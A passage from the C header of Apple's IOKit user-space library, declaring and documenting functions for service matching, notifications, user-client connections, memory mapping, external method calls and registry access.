are valid, and represent the same object in the kernel true is returned, otherwise false. */\n\nboolean_t\nIOObjectIsEqualTo(\n io_object_t object,\n io_object_t anObject );\n\n/*! @function IOObjectGetKernelRetainCount\n @abstract Returns kernel retain count of an IOKit object.\n @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level.\n @param object An IOKit object.\n @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetKernelRetainCount(\n io_object_t object )\nAVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER;\n\n/*! @function IOObjectGetUserRetainCount\n @abstract Returns the retain count for the current process of an IOKit object.\n @discussion This function may be used in diagnostics to determine the current retain count for the calling process of the kernel object.\n @param object An IOKit object.\n @result If the object handle is valid, the objects user retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetUserRetainCount(\n io_object_t object )\nAVAILABLE_MAC_OS_X_VERSION_10_6_AND_LATER;\n\n/*! @function IOObjectGetRetainCount\n @abstract Returns kernel retain count of an IOKit object. Identical to IOObjectGetKernelRetainCount() but available prior to Mac OS 10.6.\n @discussion This function may be used in diagnostics to determine the current retain count of the kernel object at the kernel level.\n @param object An IOKit object.\n @result If the object handle is valid, the kernel objects retain count is returned, otherwise zero is returned. */\n\nuint32_t\nIOObjectGetRetainCount(\n io_object_t object );\n\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOIterator, subclass of IOObject\n */\n\n/*! @function IOIteratorNext\n @abstract Returns the next object in an iteration.\n @discussion This function returns the next object in an iteration, or zero if no more remain or the iterator is invalid.\n @param iterator An IOKit iterator handle.\n @result If the iterator handle is valid, the next element in the iteration is returned, otherwise zero is returned. The element should be released by the caller when it is finished. */\n\nio_object_t\nIOIteratorNext(\n io_iterator_t iterator );\n\n/*! @function IOIteratorReset\n @abstract Resets an iteration back to the beginning.\n @discussion If an iterator is invalid, or if the caller wants to start over, IOIteratorReset will set the iteration back to the beginning.\n @param iterator An IOKit iterator handle. */\n\nvoid\nIOIteratorReset(\n io_iterator_t iterator );\n\n/*! @function IOIteratorIsValid\n @abstract Checks an iterator is still valid.\n @discussion Some iterators will be made invalid if changes are made to the structure they are iterating over. This function checks the iterator is still valid and should be called when IOIteratorNext returns zero. An invalid iterator can be reset and the iteration restarted.\n @param iterator An IOKit iterator handle.\n @result True if the iterator handle is valid, otherwise false is returned. */\n\nboolean_t\nIOIteratorIsValid(\n io_iterator_t iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService, subclass of IORegistryEntry\n */\n\n/*!\n @function IOServiceGetMatchingService\n @abstract Look up a registered IOService object that matches a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @result The first service matched is returned on success. The service must be released by the caller.\n */\n\nio_service_t\nIOServiceGetMatchingService(\n mach_port_t masterPort,\n CFDictionaryRef matching CF_RELEASES_ARGUMENT);\n\n/*! @function IOServiceGetMatchingServices\n @abstract Look up registered IOService objects that match a matching dictionary.\n @discussion This is the preferred method of finding IOService objects currently registered by IOKit (that is, objects that have had their registerService() methods invoked). To find IOService objects that aren't yet registered, use an iterator as created by IORegistryEntryCreateIterator(). IOServiceAddMatchingNotification can also supply this information and install a notification of new IOServices. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param existing An iterator handle, or NULL, is returned on success, and should be released by the caller when the iteration is finished. If NULL is returned, the iteration was successful but found no matching services.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetMatchingServices(\n mach_port_t masterPort,\n CFDictionaryRef matching CF_RELEASES_ARGUMENT,\n io_iterator_t * existing );\n\n\nkern_return_t\nIOServiceAddNotification(\n mach_port_t masterPort,\n const io_name_t notificationType,\n CFDictionaryRef matching,\n mach_port_t wakePort,\n uintptr_t reference,\n io_iterator_t * notification ) DEPRECATED_ATTRIBUTE;\n\n/*! @function IOServiceAddMatchingNotification\n @abstract Look up registered IOService objects that match a matching dictionary, and install a notification request of new IOServices that match.\n @discussion This is the preferred method of finding IOService objects that may arrive at any time. The type of notification specifies the state change the caller is interested in, on IOService's that match the match dictionary. Notification types are identified by name, and are defined in IOKitKeys.h. The matching information used in the matching dictionary may vary depending on the class of service being looked up.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the armed notification is fired. When the notification is delivered, the io_iterator_t representing the notification should be iterated through to pick up all outstanding objects. When the iteration is finished the notification is rearmed. See IONotificationPortCreate.\n @param notificationType A notification type from IOKitKeys.h\n
kIOPublishNotification Delivered when an IOService is registered.\n
kIOFirstPublishNotification Delivered when an IOService is registered, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n
kIOMatchedNotification Delivered when an IOService has had all matching drivers in the kernel probed and started.\n
kIOFirstMatchNotification Delivered when an IOService has had all matching drivers in the kernel probed and started, but only once per IOService instance. Some IOService's may be reregistered when their state is changed.\n
kIOTerminatedNotification Delivered after an IOService has been terminated.\n @param matching A CF dictionary containing matching information, of which one reference is always consumed by this function (Note prior to the Tiger release there was a small chance that the dictionary might not be released if there was an error attempting to serialize the dictionary). IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param callback A callback function called when the notification fires.\n @param refCon A reference constant for the callbacks use.\n @param notification An iterator handle is returned on success, and should be released by the caller when the notification is to be destroyed. The notification is armed when the iterator is emptied by calls to IOIteratorNext - when no more objects are returned, the notification is armed. Note the notification is not armed when first created.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddMatchingNotification(\n IONotificationPortRef notifyPort,\n const io_name_t notificationType,\n CFDictionaryRef matching CF_RELEASES_ARGUMENT,\n IOServiceMatchingCallback callback,\n void * refCon,\n io_iterator_t * notification );\n\n/*! @function IOServiceAddInterestNotification\n @abstract Register for notification of state changes in an IOService.\n @discussion IOService objects deliver notifications of their state changes to their clients via the IOService::messageClients API, and to other interested parties including callers of this function. Message types are defined IOKit/IOMessage.h.\n @param notifyPort A IONotificationPortRef object that controls how messages will be sent when the notification is fired. See IONotificationPortCreate.\n @param interestType A notification type from IOKitKeys.h\n
kIOGeneralInterest General state changes delivered via the IOService::messageClients API.\n
kIOBusyInterest Delivered when the IOService changes its busy state to or from zero. The message argument contains the new busy state causing the notification.\n @param callback A callback function called when the notification fires, with messageType and messageArgument for the state change.\n @param refCon A reference constant for the callbacks use.\n @param notification An object handle is returned on success, and should be released by the caller when the notification is to be destroyed.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceAddInterestNotification(\n IONotificationPortRef notifyPort,\n io_service_t service,\n const io_name_t interestType,\n IOServiceInterestCallback callback,\n void * refCon,\n io_object_t * notification );\n\n/*! @function IOServiceMatchPropertyTable\n @abstract Match an IOService objects with matching dictionary.\n @discussion This function calls the matching method of an IOService object and returns the boolean result.\n @param service The IOService object to match.\n @param matching A CF dictionary containing matching information. IOKitLib can construct matching dictionaries for common criteria with helper functions such as IOServiceMatching, IOServiceNameMatching, IOBSDNameMatching.\n @param matches The boolean result is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceMatchPropertyTable(\n io_service_t service,\n CFDictionaryRef matching,\n boolean_t * matches );\n\n/*! @function IOServiceGetBusyState\n @abstract Returns the busyState of an IOService.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients.\n @param service The IOService whose busyState to return.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceGetBusyState(\n io_service_t service,\n uint32_t * busyState );\n\n/*! @function IOServiceWaitQuiet\n @abstract Wait for an IOService's busyState to be zero.\n @discussion Blocks the caller until an IOService is non busy, see IOServiceGetBusyState.\n @param service The IOService wait on.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOServiceWaitQuiet(\n io_service_t service,\n mach_timespec_t * waitTime );\n\n/*! @function IOKitGetBusyState\n @abstract Returns the busyState of all IOServices.\n @discussion Many activities in IOService are asynchronous. When registration, matching, or termination is in progress on an IOService, its busyState is increased by one. Change in busyState to or from zero also changes the IOService's provider's busyState by one, which means that an IOService is marked busy when any of the above activities is ocurring on it or any of its clients. IOKitGetBusyState returns the busy state of the root of the service plane which reflects the busy state of all IOServices.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param busyState The busyState count is returned.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOKitGetBusyState(\n mach_port_t masterPort,\n uint32_t * busyState );\n\n/*! @function IOKitWaitQuiet\n @abstract Wait for a all IOServices' busyState to be zero.\n @discussion Blocks the caller until all IOServices are non busy, see IOKitGetBusyState.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param waitTime Specifies a maximum time to wait.\n @result Returns an error code if mach synchronization primitives fail, kIOReturnTimeout, or kIOReturnSuccess. */\n\nkern_return_t\nIOKitWaitQuiet(\n mach_port_t masterPort,\n mach_timespec_t * waitTime );\n\n/*! @function IOServiceOpen\n @abstract A request to create a connection to an IOService.\n @discussion A non kernel client may request a connection be opened via the IOServiceOpen() library function, which will call IOService::newUserClient in the kernel. The rules & capabilities of user level clients are family dependent, the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to open a connection to, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param owningTask The mach task requesting the connection.\n @param type A constant specifying the type of connection to be created, interpreted only by the IOService's family.\n @param connect An io_connect_t handle is returned on success, to be used with the IOConnectXXX APIs. It should be destroyed with IOServiceClose().\n @result A return code generated by IOService::newUserClient. */\n\nkern_return_t\nIOServiceOpen(\n io_service_t service,\n task_port_t owningTask,\n uint32_t type,\n io_connect_t * connect );\n\n/*! @function IOServiceRequestProbe\n @abstract A request to rescan a bus for device changes.\n @discussion A non kernel client may request a bus or controller rescan for added or removed devices, if the bus family does automatically notice such changes. For example, SCSI bus controllers do not notice device changes. The implementation of this routine is family dependent, and the default IOService implementation returns kIOReturnUnsupported.\n @param service The IOService object to request a rescan, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param options An options mask, interpreted only by the IOService's family.\n @result A return code generated by IOService::requestProbe. */\n\nkern_return_t\nIOServiceRequestProbe(\n io_service_t service,\n uint32_t options );\n\n// options for IOServiceAuthorize()\nenum {\n kIOServiceInteractionAllowed = 0x00000001\n};\n\n/*! @function IOServiceAuthorize\n @abstract Authorize access to an IOService.\n @discussion Determine whether this application is authorized to invoke IOServiceOpen() for a given IOService, either by confirming that it has been previously authorized by the user, or by soliciting the console user.\n @param service The IOService object to be authorized, usually obtained via the IOServiceGetMatchingServices or IOServiceAddNotification APIs.\n @param options kIOServiceInteractionAllowed may be set to permit user interaction, if required.\n @result kIOReturnSuccess if the IOService is authorized, kIOReturnNotPermitted if the IOService is not authorized. */\n\nkern_return_t\nIOServiceAuthorize(\n io_service_t service,\n uint32_t options );\n\nint\nIOServiceOpenAsFileDescriptor(\n io_service_t service,\n int oflag );\n\n/* * * * * * * * * * * * * * *ff * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IOService connection\n */\n\n/*! @function IOServiceClose\n @abstract Close a connection to an IOService and destroy the connect handle.\n @discussion A connection created with the IOServiceOpen should be closed when the connection is no longer to be used with IOServiceClose.\n @param connect The connect handle created by IOServiceOpen. It will be destroyed by this function, and should not be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOServiceClose(\n io_connect_t connect );\n\n/*! @function IOConnectAddRef\n @abstract Adds a reference to the connect handle.\n @discussion Adds a reference to the connect handle.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectAddRef(\n io_connect_t connect );\n\n/*! @function IOConnectRelease\n @abstract Remove a reference to the connect handle.\n @discussion Removes a reference to the connect handle. If the last reference is removed an implicit IOServiceClose is performed.\n @param connect The connect handle created by IOServiceOpen.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectRelease(\n io_connect_t connect );\n\n/*! @function IOConnectGetService\n @abstract Returns the IOService a connect handle was opened on.\n @discussion Finds the service object a connection was opened on.\n @param connect The connect handle created by IOServiceOpen.\n @param service On succes, the service handle the connection was opened on, which should be released with IOObjectRelease.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectGetService(\n io_connect_t connect,\n io_service_t * service );\n\n/*! @function IOConnectSetNotificationPort\n @abstract Set a port to receive family specific notifications.\n @discussion This is a generic method to pass a mach port send right to be be used by family specific notifications.\n @param connect The connect handle created by IOServiceOpen.\n @param type The type of notification requested, not interpreted by IOKit and family defined.\n @param port The port to which to send notifications.\n @param reference Some families may support passing a reference parameter for the callers use with the notification.\n @result A kern_return_t error code. */\n\nkern_return_t\nIOConnectSetNotificationPort(\n io_connect_t connect,\n uint32_t type,\n mach_port_t port,\n uintptr_t reference );\n\n/*! @function IOConnectMapMemory\n @abstract Map hardware or shared memory into the caller's task.\n @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection.\n @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess.\n @param ofSize The size of the mapping created is passed back on success.\n @result A kern_return_t error code. */\n\n#if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6)\n\nkern_return_t\nIOConnectMapMemory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t intoTask,\n vm_address_t *atAddress,\n vm_size_t *ofSize,\n IOOptionBits options );\n\n#else\n\nkern_return_t\nIOConnectMapMemory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t intoTask,\n mach_vm_address_t *atAddress,\n mach_vm_size_t *ofSize,\n IOOptionBits options );\n\n#endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */\n\n\n/*! @function IOConnectMapMemory64\n @abstract Map hardware or shared memory into the caller's task.\n @discussion This is a generic method to create a mapping in the callers task. The family will interpret the type parameter to determine what sort of mapping is being requested. Cache modes and placed mappings may be requested by the caller.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType What is being requested to be mapped, not interpreted by IOKit and family defined. The family may support physical hardware or shared memory mappings.\n @param intoTask The task port for the task in which to create the mapping. This may be different to the task which the opened the connection.\n @param atAddress An in/out parameter - if the kIOMapAnywhere option is not set, the caller should pass the address where it requests the mapping be created, otherwise nothing need to set on input. The address of the mapping created is passed back on sucess.\n @param ofSize The size of the mapping created is passed back on success.\n @result A kern_return_t error code. */\n\nkern_return_t IOConnectMapMemory64(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t intoTask,\n mach_vm_address_t *atAddress,\n mach_vm_size_t *ofSize,\n IOOptionBits options );\n\n/*! @function IOConnectUnmapMemory\n @abstract Remove a mapping made with IOConnectMapMemory.\n @discussion This is a generic method to remove a mapping in the callers task.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType The memory type originally requested in IOConnectMapMemory.\n @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection.\n @param atAddress The address of the mapping to be removed.\n @result A kern_return_t error code. */\n\n#if !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6)\n\nkern_return_t\nIOConnectUnmapMemory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t fromTask,\n vm_address_t atAddress );\n\n#else\n\nkern_return_t\nIOConnectUnmapMemory(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t fromTask,\n mach_vm_address_t atAddress );\n\n\n#endif /* !__LP64__ || defined(IOCONNECT_MAPMEMORY_10_6) */\n\n/*! @function IOConnectUnmapMemory64\n @abstract Remove a mapping made with IOConnectMapMemory64.\n @discussion This is a generic method to remove a mapping in the callers task.\n @param connect The connect handle created by IOServiceOpen.\n @param memoryType The memory type originally requested in IOConnectMapMemory.\n @param fromTask The task port for the task in which to remove the mapping. This may be different to the task which the opened the connection.\n @param atAddress The address of the mapping to be removed.\n @result A kern_return_t error code. */\n\nkern_return_t IOConnectUnmapMemory64(\n io_connect_t connect,\n uint32_t memoryType,\n task_port_t fromTask,\n mach_vm_address_t atAddress );\n\n\n/*! @function IOConnectSetCFProperties\n @abstract Set CF container based properties on a connection.\n @discussion This is a generic method to pass a CF container of properties to the connection. The properties are interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param properties A CF container - commonly a CFDictionary but this is not enforced. The container should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectSetCFProperties(\n io_connect_t connect,\n CFTypeRef properties );\n\n/*! @function IOConnectSetCFProperty\n @abstract Set a CF container based property on a connection.\n @discussion This is a generic method to pass a CF property to the connection. The property is interpreted by the family and commonly represent configuration settings, but may be interpreted as anything.\n @param connect The connect handle created by IOServiceOpen.\n @param propertyName The name of the property as a CFString.\n @param property A CF container - should consist of objects which are understood by IOKit - these are currently : CFDictionary, CFArray, CFSet, CFString, CFData, CFNumber, CFBoolean, and are passed in the kernel as the corresponding OSDictionary etc. objects.\n @result A kern_return_t error code returned by the object. */\n\nkern_return_t\nIOConnectSetCFProperty(\n io_connect_t connect,\n CFStringRef propertyName,\n CFTypeRef property );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n// Combined LP64 & ILP32 Extended IOUserClient::externalMethod\n\nkern_return_t\nIOConnectCallMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n const uint64_t *input, // In\n uint32_t inputCnt, // In\n const void *inputStruct, // In\n size_t inputStructCnt, // In\n uint64_t *output, // Out\n uint32_t *outputCnt, // In/Out\n void *outputStruct, // Out\n size_t *outputStructCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n mach_port_t wake_port, // In\n uint64_t *reference, // In\n uint32_t referenceCnt, // In\n const uint64_t *input, // In\n uint32_t inputCnt, // In\n const void *inputStruct, // In\n size_t inputStructCnt, // In\n uint64_t *output, // Out\n uint32_t *outputCnt, // In/Out\n void *outputStruct, // Out\n size_t *outputStructCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallStructMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n const void *inputStruct, // In\n size_t inputStructCnt, // In\n void *outputStruct, // Out\n size_t *outputStructCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncStructMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n mach_port_t wake_port, // In\n uint64_t *reference, // In\n uint32_t referenceCnt, // In\n const void *inputStruct, // In\n size_t inputStructCnt, // In\n void *outputStruct, // Out\n size_t *outputStructCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallScalarMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n const uint64_t *input, // In\n uint32_t inputCnt, // In\n uint64_t *output, // Out\n uint32_t *outputCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\nkern_return_t\nIOConnectCallAsyncScalarMethod(\n mach_port_t connection, // In\n uint32_t selector, // In\n mach_port_t wake_port, // In\n uint64_t *reference, // In\n uint32_t referenceCnt, // In\n const uint64_t *input, // In\n uint32_t inputCnt, // In\n uint64_t *output, // Out\n uint32_t *outputCnt) // In/Out\nAVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\nkern_return_t\nIOConnectTrap0(io_connect_t connect,\n uint32_t index );\n\nkern_return_t\nIOConnectTrap1(io_connect_t connect,\n uint32_t index,\n uintptr_t p1 );\n\nkern_return_t\nIOConnectTrap2(io_connect_t connect,\n uint32_t index,\n uintptr_t p1,\n uintptr_t p2);\n\nkern_return_t\nIOConnectTrap3(io_connect_t connect,\n uint32_t index,\n uintptr_t p1,\n uintptr_t p2,\n uintptr_t p3);\n\nkern_return_t\nIOConnectTrap4(io_connect_t connect,\n uint32_t index,\n uintptr_t p1,\n uintptr_t p2,\n uintptr_t p3,\n uintptr_t p4);\n\nkern_return_t\nIOConnectTrap5(io_connect_t connect,\n uint32_t index,\n uintptr_t p1,\n uintptr_t p2,\n uintptr_t p3,\n uintptr_t p4,\n uintptr_t p5);\n\nkern_return_t\nIOConnectTrap6(io_connect_t connect,\n uint32_t index,\n uintptr_t p1,\n uintptr_t p2,\n uintptr_t p3,\n uintptr_t p4,\n uintptr_t p5,\n uintptr_t p6);\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*! @function IOConnectAddClient\n @abstract Inform a connection of a second connection.\n @discussion This is a generic method to inform a family connection of a second connection, and is rarely used.\n @param connect The connect handle created by IOServiceOpen.\n @param client Another connect handle created by IOServiceOpen.\n @result A kern_return_t error code returned by the family. */\n\nkern_return_t\nIOConnectAddClient(\n io_connect_t connect,\n io_connect_t client );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistry accessors\n */\n\n/*! @function IORegistryGetRootEntry\n @abstract Return a handle to the registry root.\n @discussion This method provides an accessor to the root of the registry for the machine. The root may be passed to a registry iterator when iterating a plane, and contains properties that describe the available planes, and diagnostic information for IOKit.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @result A handle to the IORegistryEntry root instance, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryGetRootEntry(\n mach_port_t masterPort );\n\n/*! @function IORegistryEntryFromPath\n @abstract Looks up a registry entry by path.\n @discussion This function parses paths to lookup registry entries. The path should begin with ':' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param path A C-string path.\n @result A handle to the IORegistryEntry witch was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryEntryFromPath(\n mach_port_t masterPort,\n const io_string_t path );\n\n\n/*! @function IORegistryEntryFromPathCFString\n @abstract Looks up a registry entry by path.\n @discussion This function parses paths to lookup registry entries. The path should begin with ':' If there are characters remaining unparsed after an entry has been looked up, this is considered an invalid lookup. Paths are further documented in IORegistryEntry.h\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param path A CFString path.\n @result A handle to the IORegistryEntry witch was found with the path, to be released with IOObjectRelease by the caller, or MACH_PORT_NULL on failure. */\n\nio_registry_entry_t\nIORegistryEntryCopyFromPath(\n mach_port_t masterPort,\n CFStringRef path )\n#if defined(__MAC_10_11)\n__OSX_AVAILABLE_STARTING(__MAC_10_11, __IPHONE_9_0)\n#endif\n;\n\n// options for IORegistryCreateIterator(), IORegistryEntryCreateIterator, IORegistryEntrySearchCFProperty()\nenum {\n kIORegistryIterateRecursively = 0x00000001,\n kIORegistryIterateParents = 0x00000002\n};\n\n/*! @function IORegistryCreateIterator\n @abstract Create an iterator rooted at the registry root.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children of the registry root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param masterPort The master port obtained from IOMasterPort(). Pass kIOMasterPortDefault to look up the default master port.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator.\n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryCreateIterator(\n mach_port_t masterPort,\n const io_name_t plane,\n IOOptionBits options,\n io_iterator_t * iterator );\n\n/*! @function IORegistryEntryCreateIterator\n @abstract Create an iterator rooted at a given registry entry.\n @discussion This method creates an IORegistryIterator in the kernel that is set up with options to iterate children or parents of a root entry, and to recurse automatically into entries as they are returned, or only when instructed with calls to IORegistryIteratorEnterEntry. The iterator object keeps track of entries that have been recursed into previously to avoid loops.\n @param entry The root entry to begin the iteration at.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param options kIORegistryIterateRecursively may be set to recurse automatically into each entry as it is returned from IOIteratorNext calls on the registry iterator. kIORegistryIterateParents may be set to iterate the parents of each entry, by default the children are iterated.\n @param iterator A created iterator handle, to be released by the caller when it has finished with it.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryCreateIterator(\n io_registry_entry_t entry,\n const io_name_t plane,\n IOOptionBits options,\n io_iterator_t * iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryIterator, subclass of IOIterator\n */\n\n/*! @function IORegistryIteratorEnterEntry\n @abstract Recurse into the current entry in the registry iteration.\n @discussion This method makes the current entry, ie. the last entry returned by IOIteratorNext, the root in a new level of recursion.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryIteratorEnterEntry(\n io_iterator_t iterator );\n\n/*! @function IORegistryIteratorExitEntry\n @abstract Exits a level of recursion, restoring the current entry.\n @discussion This method undoes an IORegistryIteratorEnterEntry, restoring the current entry. If there are no more levels of recursion to exit false is returned, otherwise true is returned.\n @result kIOReturnSuccess if a level of recursion was undone, kIOReturnNoDevice if no recursive levels are left in the iteration. */\n\nkern_return_t\nIORegistryIteratorExitEntry(\n io_iterator_t iterator );\n\n/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */\n\n/*\n * IORegistryEntry, subclass of IOObject\n */\n\n/*! @function IORegistryEntryGetName\n @abstract Returns a C-string name assigned to a registry entry.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's global name. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetName(\n io_registry_entry_t entry,\n io_name_t name );\n\n/*! @function IORegistryEntryGetNameInPlane\n @abstract Returns a C-string name assigned to a registry entry, in a specified plane.\n @discussion Registry entries can be named in a particular plane, or globally. This function returns the entry's name in the specified plane or global name if it has not been named in that plane. The global name defaults to the entry's meta class name if it has not been named.\n @param entry The registry entry handle whose name to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param name The caller's buffer to receive the name.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetNameInPlane(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_name_t name );\n\n/*! @function IORegistryEntryGetLocationInPlane\n @abstract Returns a C-string location assigned to a registry entry, in a specified plane.\n @discussion Registry entries can given a location string in a particular plane, or globally. If the entry has had a location set in the specified plane that location string will be returned, otherwise the global location string is returned. If no global location string has been set, an error is returned.\n @param entry The registry entry handle whose name to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param location The caller's buffer to receive the location string.\n @result A kern_return_t error code. */\n\nkern_return_t\nIORegistryEntryGetLocationInPlane(\n io_registry_entry_t entry,\n const io_name_t plane,\n io_name_t location );\n\n/*! @function IORegistryEntryGetPath\n @abstract Create a path for a registry entry.\n @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. An alias may also exist for the entry, and will be returned if available.\n @param entry The registry entry handle whose path to look up.\n @param plane The name of an existing registry plane. Plane names are defined in IOKitKeys.h, eg. kIOServicePlane.\n @param path A char buffer allocated by the caller.\n @result IORegistryEntryGetPath will fail if the entry is not attached in the plane, or if the buffer is 